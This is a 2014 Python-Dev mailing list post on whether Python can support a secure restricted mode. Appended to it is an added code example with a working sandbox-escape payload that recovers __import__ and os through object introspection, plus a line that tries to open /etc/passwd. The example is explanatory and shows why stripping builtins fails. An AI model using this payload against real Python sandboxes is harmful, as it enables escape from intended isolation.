[Python-Dev] Reviving restricted mode?
ijmorlan at uwaterloo.ca
Wed Aug 13 19:11:23 CEST 2014
On Thu, 14 Aug 2014, Steven D'Aprano wrote:
> On Thu, Aug 14, 2014 at 02:26:29AM +1000, Chris Angelico wrote:
>> On Wed, Aug 13, 2014 at 11:11 PM, Isaac Morland <ijmorlan at uwaterloo.ca> wrote:
>>> While I would not claim a Python sandbox is utterly impossible, I'm
>>> suspicious that the whole "consenting adults" approach in Python is
>>> incompatible with a sandbox. The whole idea of a sandbox is to absolutely
>>> prevent people from doing things even if they really want to and know what
>>> they are doing.
> The point of a sandbox is that I, the consenting adult writing the
> application in the first place, may want to allow *untrusted others* to
> call Python code without giving them control of the entire application.
> The consenting adults rule applies to me, the application writer, not
> them, the end-users, even if they happen to be writing Python code. If
> they want unrestricted access to the Python interpreter, they can run
> their code on their own machine, not mine.
Yes, absolutely, and I didn't mean to contradict what you are saying.
What I am suggesting is that the basic design of Python isn't a good
starting point for imposing mandatory restrictions on what code can do.
By contrast, take something like Safe Haskell. I'm not absolutely certain
that it really is safe as promised, but it's starting from a very
different language in which the compiler performs extremely sophisticated
type checking and simply won't compile programs that don't work within the
This isn't a knock on Python (which I love using, by the way), just being
realistic about what the existing language is likely to be able to
support. Having said that, I'll be very interested if somebody does come
up with a restricted mode Python that is widely accepted as being secure -
that would be a real achievement.
Isaac Morland
CSCF Web Guru
DC 2554C, x36650
WWW Software Specialist
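The following is an added example, not code from the thread or from any Python restricted-mode implementation. It makes concrete the point Isaac is making about Python's design: `run_restricted()` is a hypothetical minimal "restricted mode" that executes untrusted code with an empty `__builtins__`, so `open`, `__import__` and `exec` are simply not bound, and `ESCAPE_PAYLOAD` is a constructed attacker script that recovers the real builtins using nothing but attribute access and subscripting, which the language cannot take away without ceasing to be Python. `SandboxSession` is a stand-in for any host-side class; the names are all assumptions made for this example.

```python
"""Builtin-stripping is not a Python sandbox (added example, CPython behaviour)."""


def run_restricted(code: str) -> dict:
    """Hypothetical 'restricted mode': run untrusted code with no builtins.

    Returns the namespace so the caller can inspect what the code managed to
    bind.  Direct use of open/__import__/exec fails with NameError here.
    """
    namespace = {"__builtins__": {}}
    exec(code, namespace)
    return namespace


class SandboxSession:
    """Stand-in for any ordinary host-side class.

    Any class with a Python-level __init__ leaks its module globals, and with
    them the genuine __builtins__, through cls.__init__.__globals__.  Untrusted
    code reaches this class from an empty tuple via object.__subclasses__().
    """

    def __init__(self, label: str) -> None:
        self.label = label


def names_are_gone() -> bool:
    """Sanity check: the restriction does defeat a direct attempt."""
    try:
        run_restricted("f = open('/etc/passwd')")
    except NameError:
        return True
    return False


# Constructed attacker payload.  Walk tuple -> object -> each direct subclass,
# find one whose __init__ is a Python function, read the real builtins out of
# that function's module globals, then call __import__ directly (an import
# statement would still fail, since it looks __import__ up in the empty
# builtins, but calling the recovered function object does not).
ESCAPE_PAYLOAD = """
recovered = None
for cls in ().__class__.__base__.__subclasses__():
    try:
        b = cls.__init__.__globals__['__builtins__']
        # Module globals hold either the builtins dict or, in __main__, the
        # builtins module; {}.__class__ is dict without naming 'dict'.
        recovered = b['__import__'] if b.__class__ is {}.__class__ else b.__import__
        break
    except:
        continue
os_module = recovered('os')
cwd = os_module.getcwd()
"""


def escape_recovers_os() -> bool:
    """Run the payload inside the 'sandbox'; True if it got the os module back."""
    ns = run_restricted(ESCAPE_PAYLOAD)
    return ns["recovered"] is not None and ns["os_module"].__name__ == "os"


if __name__ == "__main__":
    print("direct open() blocked:", names_are_gone())
    print("payload reached os via introspection:", escape_recovers_os())
```

Run as a script, the first check passes and the second shows the escape succeeding in the same interpreter. Nothing in the payload depends on a builtin name being available; it needs only the attribute protocol, which is why removing names, or even removing the `import` statement, does not yield a boundary. Any real boundary has to be enforced outside the interpreter (a separate process, OS-level sandboxing, or a different language design such as the Safe Haskell approach mentioned above).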